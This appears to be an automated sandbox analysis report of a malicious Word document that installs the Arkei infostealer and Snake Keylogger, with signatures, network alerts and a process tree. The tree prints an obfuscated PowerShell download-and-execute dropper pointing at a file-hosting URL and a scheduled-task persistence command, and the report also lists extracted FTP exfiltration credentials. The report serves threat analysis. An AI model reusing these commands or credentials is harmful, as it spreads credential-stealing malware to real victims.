Analysis

  • max time kernel
    93s
  • max time network
    138s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    24-05-2022 08:22

General

  • Target

    NEW ORDER.docx

  • Size

    183KB

  • MD5

    e3269bf05703bb2d4e7cfcceca146ed5

  • SHA1

    e5e2a9a4c2dca94eb93669ef73219cfc7754a260

  • SHA256

    0d3613b7a4aec3b9ad6f0fc308bdf7da98a4574e6cae6ab91a8c0ea4857f1fbc

  • SHA512

    acd7810464891ad926e63b579b6b09bb569397b5f8edbbbce4c9d2407cfe2d9a807d5f2a314cf592ff489a14773ee206e9029b077953503b58ba8d22586c8f15

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://www.mediafire.com/file/jjqt737nagc8wqp/1.dll/file

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    103.153.77.98
  • Port:
    21
  • Username:
    jfhdjfhd1
  • Password:
    fhsjdhsje3333

Extracted

Family

arkei

Botnet

Default

Signatures

  • Arkei

    Arkei is an infostealer written in C++.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

  • Snake Keylogger Payload 3 IoCs
  • suricata: ET MALWARE Generic gate .php GET with minimal headers

    suricata: ET MALWARE Generic gate .php GET with minimal headers

  • suricata: ET MALWARE Trojan Generic - POST To gate.php with no accept headers

    suricata: ET MALWARE Trojan Generic - POST To gate.php with no accept headers

  • suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer

    suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer

  • suricata: ET MALWARE Win32/Vidar Variant/Mars Stealer CnC Exfil

    suricata: ET MALWARE Win32/Vidar Variant/Mars Stealer CnC Exfil

  • Blocklisted process makes network request 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 4 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Drops desktop.ini file(s) 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 20 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of SetWindowsHookEx 15 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\NEW ORDER.docx" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2160
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:800
    • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
      "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
      1⤵
      • Checks processor information in registry
      • Enumerates system info in registry
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3732
      • C:\Windows\SYSTEM32\WSCRIPT.exe
        WSCRIPT C:\Users\Public\update.js
        2⤵
        • Process spawned unexpected child process
        PID:4260
    • C:\ProgramData\ddond.com
      C:\ProgramData\ddond.com https://www.mediafire.com/file/frjrn9astpfr2ua/1.htm/file
      1⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Modifies system certificate store
      • Suspicious use of WriteProcessMemory
      PID:4828
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $MMMMMMM=((n`e`W`-Obj`E`c`T (('Net'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'.'+'W'+'eb'+'c'+''+''+''+''+''+''+''+''+''+'lient'))).(('D'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'o'+'w'+'n'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).invoke((('https://www.mediafire.com/file/jjqt737nagc8wqp/1.dll/file'))));Invoke-Expression $MMMMMMM
        2⤵
        • Blocklisted process makes network request
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3908
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qyy3wocm\qyy3wocm.cmdline"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3180
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1DB9.tmp" "c:\Users\Admin\AppData\Local\Temp\qyy3wocm\CSC1D7762912E0C47A082221D91DFF60B0.TMP"
            4⤵
              PID:1980
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
            3⤵
            • Loads dropped DLL
            • Drops file in System32 directory
            PID:1248
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1248 -s 1348
              4⤵
              • Program crash
              PID:1172
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
            "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
            3⤵
            • Loads dropped DLL
            • Drops file in System32 directory
            • Checks processor information in registry
            • Suspicious use of WriteProcessMemory
            PID:3704
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe" & exit
              4⤵
                PID:5076
                • C:\Windows\SysWOW64\timeout.exe
                  timeout /t 5
                  5⤵
                  • Delays execution with timeout.exe
                  PID:2548
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
              3⤵
                PID:2480
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                3⤵
                • Accesses Microsoft Outlook profiles
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:3436
                • C:\Windows\SysWOW64\netsh.exe
                  "netsh" wlan show profile
                  4⤵
                    PID:2108
                • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                  "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
                  3⤵
                  • Accesses Microsoft Outlook profiles
                  • Drops desktop.ini file(s)
                  • Drops file in Windows directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  • outlook_office_path
                  • outlook_win_path
                  PID:1952
                  • C:\Windows\SysWOW64\netsh.exe
                    "netsh" wlan show profile
                    4⤵
                      PID:3500
                • C:\Windows\System32\schtasks.exe
                  "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 83 /tn calsaasdendersw /F /tr """C:\ProgramData\milon.com""""""https://www.mediafire.com/file/3cv72x1byy9pj9q/1.htm/file"""
                  2⤵
                  • Creates scheduled task(s)
                  PID:4844
                • C:\Windows\System32\taskkill.exe
                  "C:\Windows\System32\taskkill.exe" /f /im WinWord.exe
                  2⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4012
                • C:\Windows\System32\taskkill.exe
                  "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
                  2⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2952
                • C:\Windows\System32\taskkill.exe
                  "C:\Windows\System32\taskkill.exe" /f /im POWERPNT.exe
                  2⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1828
              • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
                "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
                1⤵
                  PID:3328
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1248 -ip 1248
                  1⤵
                    PID:1560

                  Network

                  MITRE ATT&CK Enterprise v6

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\ProgramData\ddond.com

                    Filesize

                    14KB

                    MD5

                    0b4340ed812dc82ce636c00fa5c9bef2

                    SHA1

                    51c97ebe601ef079b16bcd87af827b0be5283d96

                    SHA256

                    dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895

                    SHA512

                    d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

                  • C:\ProgramData\ddond.com

                    Filesize

                    14KB

                    MD5

                    0b4340ed812dc82ce636c00fa5c9bef2

                    SHA1

                    51c97ebe601ef079b16bcd87af827b0be5283d96

                    SHA256

                    dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895

                    SHA512

                    d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

                  • C:\ProgramData\freebl3.dll

                    Filesize

                    326KB

                    MD5

                    ef2834ac4ee7d6724f255beaf527e635

                    SHA1

                    5be8c1e73a21b49f353c2ecfa4108e43a883cb7b

                    SHA256

                    a770ecba3b08bbabd0a567fc978e50615f8b346709f8eb3cfacf3faab24090ba

                    SHA512

                    c6ea0e4347cbd7ef5e80ae8c0afdca20ea23ac2bdd963361dfaf562a9aed58dcbc43f89dd826692a064d76c3f4b3e92361af7b79a6d16a75d9951591ae3544d2

                  • C:\ProgramData\mozglue.dll

                    Filesize

                    133KB

                    MD5

                    8f73c08a9660691143661bf7332c3c27

                    SHA1

                    37fa65dd737c50fda710fdbde89e51374d0c204a

                    SHA256

                    3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

                    SHA512

                    0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

                  • C:\ProgramData\mozglue.dll

                    Filesize

                    133KB

                    MD5

                    8f73c08a9660691143661bf7332c3c27

                    SHA1

                    37fa65dd737c50fda710fdbde89e51374d0c204a

                    SHA256

                    3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

                    SHA512

                    0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

                  • C:\ProgramData\mozglue.dll

                    Filesize

                    133KB

                    MD5

                    8f73c08a9660691143661bf7332c3c27

                    SHA1

                    37fa65dd737c50fda710fdbde89e51374d0c204a

                    SHA256

                    3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

                    SHA512

                    0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

                  • C:\ProgramData\msvcp140.dll

                    Filesize

                    429KB

                    MD5

                    109f0f02fd37c84bfc7508d4227d7ed5

                    SHA1

                    ef7420141bb15ac334d3964082361a460bfdb975

                    SHA256

                    334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4

                    SHA512

                    46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

                  • C:\ProgramData\nss3.dll

                    Filesize

                    1.2MB

                    MD5

                    bfac4e3c5908856ba17d41edcd455a51

                    SHA1

                    8eec7e888767aa9e4cca8ff246eb2aacb9170428

                    SHA256

                    e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                    SHA512

                    2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                  • C:\ProgramData\nss3.dll

                    Filesize

                    1.2MB

                    MD5

                    bfac4e3c5908856ba17d41edcd455a51

                    SHA1

                    8eec7e888767aa9e4cca8ff246eb2aacb9170428

                    SHA256

                    e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                    SHA512

                    2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                  • C:\ProgramData\nss3.dll

                    Filesize

                    1.2MB

                    MD5

                    bfac4e3c5908856ba17d41edcd455a51

                    SHA1

                    8eec7e888767aa9e4cca8ff246eb2aacb9170428

                    SHA256

                    e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                    SHA512

                    2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                  • C:\ProgramData\softokn3.dll

                    Filesize

                    141KB

                    MD5

                    a2ee53de9167bf0d6c019303b7ca84e5

                    SHA1

                    2a3c737fa1157e8483815e98b666408a18c0db42

                    SHA256

                    43536adef2ddcc811c28d35fa6ce3031029a2424ad393989db36169ff2995083

                    SHA512

                    45b56432244f86321fa88fbcca6a0d2a2f7f4e0648c1d7d7b1866adc9daa5eddd9f6bb73662149f279c9ab60930dad1113c8337cb5e6ec9eed5048322f65f7d8

                  • C:\ProgramData\vcruntime140.dll

                    Filesize

                    81KB

                    MD5

                    7587bf9cb4147022cd5681b015183046

                    SHA1

                    f2106306a8f6f0da5afb7fc765cfa0757ad5a628

                    SHA256

                    c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d

                    SHA512

                    0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

                  • C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\84E8B8E0-5D42-45C4-BC54-10EE254E23D9

                    Filesize

                    145KB

                    MD5

                    4669bec5180092409dcaf501e802ffb9

                    SHA1

                    340e3965ae0095b44307e761ed8707ea60b86e67

                    SHA256

                    188b60377308b13d810205824a4cf19742e7722281c6197be2295081d18b53ba

                    SHA512

                    0ff588146066e6b9f15033a7d12393a0fd1f52a45fe8f6013dd3360c233cb7d9fb9828272f8e3ccef7dabaeb81241c48527e99374ec980288dfb679f2769e5b6

                  • C:\Users\Admin\AppData\Local\Temp\RES1DB9.tmp

                    Filesize

                    1KB

                    MD5

                    bd05e9e397d34114392aeaa39c7f27a9

                    SHA1

                    03386451c580f1e98f629b91d7bdaae8a8f54c9d

                    SHA256

                    d0ebbf25d71f86a35358e1cbfed168a9794698bccd204c5eed5ec6444095db8b

                    SHA512

                    ead2fec0a0cddabaadde80bf91b20911bdb9361b5d6be8ed6e8e3f1e1eab87751f2ffb4d90b125f7ef900690d021723b5fbfdc8252408a11a2df2d333d1f801f

                  • C:\Users\Admin\AppData\Local\Temp\qyy3wocm\qyy3wocm.dll

                    Filesize

                    3KB

                    MD5

                    2e4b91db8e201f17871e8d0968086903

                    SHA1

                    04afd3c85ed6e17e299b61dd732837f339aa5f11

                    SHA256

                    8b7d2001655113188711cf5c42c7ceeb5af4b46371cc7cc831c4aae32aa9416c

                    SHA512

                    09883deacdddfbadaa6976c87c8d5768c68117c63c59607c452080765274e200ff88b70b16bfd6d7d114ccd0a4e6d31cce839b7eeeec5bf0ad549dcfbb8e4b9e

                  • C:\Users\Public\update.js

                    Filesize

                    4KB

                    MD5

                    85dd8660f73e963b4cc118fcc6c5e0ff

                    SHA1

                    dad070232ef6f5f4f2108c14e5aa8edcfb918f19

                    SHA256

                    19d041a92459565d69e4b88c6add11f53cedadd34a03136facdaec16937dc9f8

                    SHA512

                    1ee1da0b79d08dd33b21e1a85bf315ecaf5b2ddea8bbb251b98bbe08c614f1bb839b5b74afe06beb2ebc11fec4f445c8b38dc9125d333cbcc778017d0998dda6

                  • \??\c:\Users\Admin\AppData\Local\Temp\qyy3wocm\CSC1D7762912E0C47A082221D91DFF60B0.TMP

                    Filesize

                    652B

                    MD5

                    aa6c9560b652b8ed33cd1f93cc276154

                    SHA1

                    88b80dacd31857d0ebae5e9e9b645dc7360f6e7c

                    SHA256

                    bb707e9973f2c3e8caa9e3b409e845a27aacb98f0dc302b7e5fb347987b829d9

                    SHA512

                    f7a249fddbec7a00074e67b2aef8efd7f219cae36dd4c998b939b6781b21a2f1cb0b0ce0966de54ebe0c15aec65664de329cadce1d876a1761443b36ecabf076

                  • \??\c:\Users\Admin\AppData\Local\Temp\qyy3wocm\qyy3wocm.0.cs

                    Filesize

                    840B

                    MD5

                    268033bad46157d9949101dfdbd69f95

                    SHA1

                    14a7532c9470d058536ff71251abc55320dee08e

                    SHA256

                    17b8a040220f09bb5eeb9530460b8e7ab64eafabef7623dec029158d9f7faf7f

                    SHA512

                    09c43d5277e41983127be6fc2b915ff506e461a8847b4bd25446d1b7db63085f59fb5c342771bf730b913aa46150912919190c86960d33d96d4c513163f0068b

                  • \??\c:\Users\Admin\AppData\Local\Temp\qyy3wocm\qyy3wocm.cmdline

                    Filesize

                    369B

                    MD5

                    c9d181dd829aee3c18d78ad9b462cc34

                    SHA1

                    c1d49a2f09e9d04d14e7c722b8270fe3baf5f5af

                    SHA256

                    24d3583399ce38dc8eec4ea81d440046d24d3d11eeca46c745ee7db643c2fd91

                    SHA512

                    ee0e488be8cfe1eb3e42f87d38bdf970ee6318861cafc80a518eba3945de1e97a2b789c9727c17de34c17a10e3f8080ee5a4c12e43a9c484c7b5d55d4261f3bf

                  • memory/1248-186-0x0000000060900000-0x0000000060992000-memory.dmp

                    Filesize

                    584KB

                  • memory/1248-171-0x0000000000400000-0x000000000043D000-memory.dmp

                    Filesize

                    244KB

                  • memory/1248-174-0x0000000000400000-0x000000000043D000-memory.dmp

                    Filesize

                    244KB

                  • memory/1248-166-0x0000000000400000-0x000000000043D000-memory.dmp

                    Filesize

                    244KB

                  • memory/1952-182-0x0000000073490000-0x0000000073A41000-memory.dmp

                    Filesize

                    5.7MB

                  • memory/2160-130-0x00007FFDED470000-0x00007FFDED480000-memory.dmp

                    Filesize

                    64KB

                  • memory/2160-131-0x00007FFDED470000-0x00007FFDED480000-memory.dmp

                    Filesize

                    64KB

                  • memory/2160-135-0x00007FFDEADC0000-0x00007FFDEADD0000-memory.dmp

                    Filesize

                    64KB

                  • memory/2160-134-0x00007FFDED470000-0x00007FFDED480000-memory.dmp

                    Filesize

                    64KB

                  • memory/2160-133-0x00007FFDED470000-0x00007FFDED480000-memory.dmp

                    Filesize

                    64KB

                  • memory/2160-132-0x00007FFDED470000-0x00007FFDED480000-memory.dmp

                    Filesize

                    64KB

                  • memory/2160-136-0x00007FFDEADC0000-0x00007FFDEADD0000-memory.dmp

                    Filesize

                    64KB

                  • memory/3436-176-0x0000000000400000-0x000000000047C000-memory.dmp

                    Filesize

                    496KB

                  • memory/3436-185-0x00000000069A0000-0x0000000006A32000-memory.dmp

                    Filesize

                    584KB

                  • memory/3436-236-0x0000000006D30000-0x0000000006D3A000-memory.dmp

                    Filesize

                    40KB

                  • memory/3436-181-0x00000000056A0000-0x000000000573C000-memory.dmp

                    Filesize

                    624KB

                  • memory/3436-180-0x0000000005BB0000-0x0000000006154000-memory.dmp

                    Filesize

                    5.6MB

                  • memory/3704-175-0x0000000000400000-0x000000000043D000-memory.dmp

                    Filesize

                    244KB

                  • memory/3908-156-0x000001E061A60000-0x000001E061A82000-memory.dmp

                    Filesize

                    136KB

                  • memory/3908-158-0x00007FFDFF030000-0x00007FFDFFAF1000-memory.dmp

                    Filesize

                    10.8MB